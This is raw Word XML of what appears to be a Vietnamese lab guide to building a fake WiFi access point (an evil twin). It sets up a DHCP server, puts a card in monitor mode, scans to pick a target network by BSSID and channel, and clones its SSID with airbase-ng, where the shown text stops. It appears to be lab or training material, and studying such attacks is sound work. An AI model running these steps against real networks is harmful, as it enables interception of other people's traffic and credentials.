    <w:p w14:paraId="4B144FF6" w14:textId="1559F251" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191" w:hanging="794"/>
      </w:pPr>
      <w:r>
        <w:t>Chú ý : Cần có 2 card mạng để có thể làm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1B789" w14:textId="397B221A" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:r>
        <w:t>Kiểm tra card mạng</w:t>
      </w:r>
      <w:r w:rsidR="005C7CEB">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690CAB5" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="00B13D6A" w:rsidRDefault="005C7CEB" w:rsidP="00B13D6A"/>
    <w:p w14:paraId="084472F3" w14:textId="436A1DD0" w:rsidR="00B13D6A" w:rsidRPr="005C7CEB" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59068ABB" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="00B13D6A" w:rsidRDefault="005C7CEB" w:rsidP="00B13D6A"/>
    <w:p w14:paraId="58B4C3BC" w14:textId="1B6001AC" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B52CEEB" wp14:editId="52D8C8DD">
            <wp:extent cx="5457825" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="9525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DB88" w14:textId="605319B2" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:r>
        <w:t>Card đang ở monitor mode : wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0DBC52" w14:textId="70B15023" w:rsidR="00B13D6A" w:rsidRPr="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:r>
        <w:t xml:space="preserve">Card để kết nối ra internet  : wlan0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EA3DB" w14:textId="14E30DD3" w:rsidR="00B13D6A" w:rsidRPr="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13D6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B.1 Cài đặt và cấu hình isc-dhcp-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B568D3" w14:textId="31327690" w:rsidR="00B13D6A" w:rsidRDefault="005C7CEB" w:rsidP="00B13D6A">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7CEB">
        <w:t xml:space="preserve"> Khởi động terminal và gõ lệnh sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FB33CC" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="00B13D6A"/>
    <w:p w14:paraId="758EE217" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C684D0B" w14:textId="69DA3E68" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apt-get install isc-dhcp-server –y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74990A5F" w14:textId="2E2FE29D" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB"/>
    <w:p w14:paraId="7E155D80" w14:textId="3C14B082" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC044FD" wp14:editId="5A237700">
            <wp:extent cx="5953125" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="952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2FF1" w14:textId="0D87DE37" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AC8D66E" wp14:editId="68728C93">
            <wp:extent cx="6120765" cy="2012315"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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C4B" w14:textId="6558B50F" w:rsidR="005C7CEB" w:rsidRPr="00EA2CAF" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:r w:rsidRPr="00EA2CAF">
        <w:t>2. Cấu hình isc-dhcp-server bằng cách chỉnh sửa /etc/dhcp/dhcpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726E5D4" w14:textId="1B834D93" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Gõ lệnh để vào file để chỉnh sửa :</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7CEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nano /etc/dhcp/dhcpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B884D15" w14:textId="1ED68831" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="00EA2CAF">
      <w:r>
        <w:t>Cấu hình như sau :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27338988" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF"/>
    <w:p w14:paraId="3B55EAEC" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authoritative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A223AFF" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default-lease-time 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E2B9E" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>max-lease-time 7200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C2436" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subnet 192.168.1.0 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA62753" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F70CB" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>option subnet-mask 255.255.255.0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D70D31" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>option broadcast-address 192.168.1.255;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7621C46C" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>option routers 192.168.1.1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08796936" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>option domain-name-servers 8.8.8.8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5E767" w14:textId="77777777" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>range 192.168.1.10 192.168.1.100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610D359" w14:textId="274B2965" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3FD21" w14:textId="5E88D91E" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8A68F2" wp14:editId="37E8F650">
            <wp:extent cx="4286250" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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414B" w14:textId="5DE97FBB" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ctrl+X  =&gt; Y =&gt;Enter : Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D60B76" w14:textId="4701F0D3" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB"/>
    <w:p w14:paraId="3080B275" w14:textId="544B0A3E" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB"/>
    <w:p w14:paraId="5DD4E143" w14:textId="7F2FF60D" w:rsidR="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="005C7CEB"/>
    <w:p w14:paraId="6DFF5425" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="005C7CEB"/>
    <w:p w14:paraId="5487B118" w14:textId="389A711E" w:rsidR="005C7CEB" w:rsidRPr="005C7CEB" w:rsidRDefault="005C7CEB" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7CEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Giải quyết vấn đề xung đột giữa Airmon-Ng và Network Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB32913" w14:textId="42EC85E5" w:rsidR="005C7CEB" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ớc khi kích hoạt chế độ giám sát trên wireless card thì ta phải giải quyết sự đụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>ộ giữa airmon-ng và network-manager. Ta không cần phải kill dịch vụ network-manager hay ngắt kết nối tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ớc khi wireless adapter vào chế độ giám sát một cách thủ công, bằng cách sử dụng airmon-ng kiểm tra kill mỗi lần chúng ta cần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D97956" w14:textId="673034BB" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t>Chỉnh sữa đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t>ờng dẫn tập tin /etc/NetworkManager/NetworkManager.conf theo mẫu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63E378" w14:textId="4D2D62D7" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nano  /etc/NetworkManager/NetworkManager.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17607C9A" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[keyfile]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B98ED32" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D07B6B" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unmanaged-devices=interface-name:wlan0mon;interface-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B9336" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB4235" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D579895" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6135A7E6" w14:textId="6D63CDCC" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAEBD8" w14:textId="108F7F7B" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663FC854" wp14:editId="37F53129">
            <wp:extent cx="5753100" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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3C04" w14:textId="39B69912" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tạo Wifi Access Point giả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6F822" w14:textId="368314AB" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t xml:space="preserve"> Mở wireless adapter vào chế độ giám sát</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCB977" w14:textId="480615F8" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85A66F" w14:textId="77777777" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A48F18" w14:textId="04977054" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t>2. Dùng lệnh sau để theo dõi thông số các wifi internet trong phạm vi, để lấy thông tin wireless mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCF233" w14:textId="2D1B24AD" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>airodump-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055AD239" w14:textId="083F923A" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D9736C" w14:textId="5FFA0487" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F734D06" w14:textId="069DFEC3" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927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A14154A" wp14:editId="67BE3256">
            <wp:extent cx="6120765" cy="3728720"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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396E" w14:textId="3159416E" w:rsidR="00EA2CAF" w:rsidRPr="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t xml:space="preserve">Wifi mục tiệu ở đây là  : </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NC – WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FEE27" w14:textId="511F14E8" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t xml:space="preserve">BSSID : </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>74:DA:88:AD:D3:69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071E1AC" w14:textId="05DBE9E4" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Channel : </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A88F97" w14:textId="3D9983CC" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4562112F" w14:textId="76FD331A" w:rsidR="00EA2CAF" w:rsidRDefault="00EA2CAF" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2CAF">
        <w:t>3. Tiến hành khởi tạo AP giả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E6022" w14:textId="60321C4C" w:rsidR="00EA2CAF" w:rsidRDefault="00A65199" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>airbase-ng -e "NC – WPA2" -c 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> wlan0mon</w:t>
      </w:r>
    </w:p>
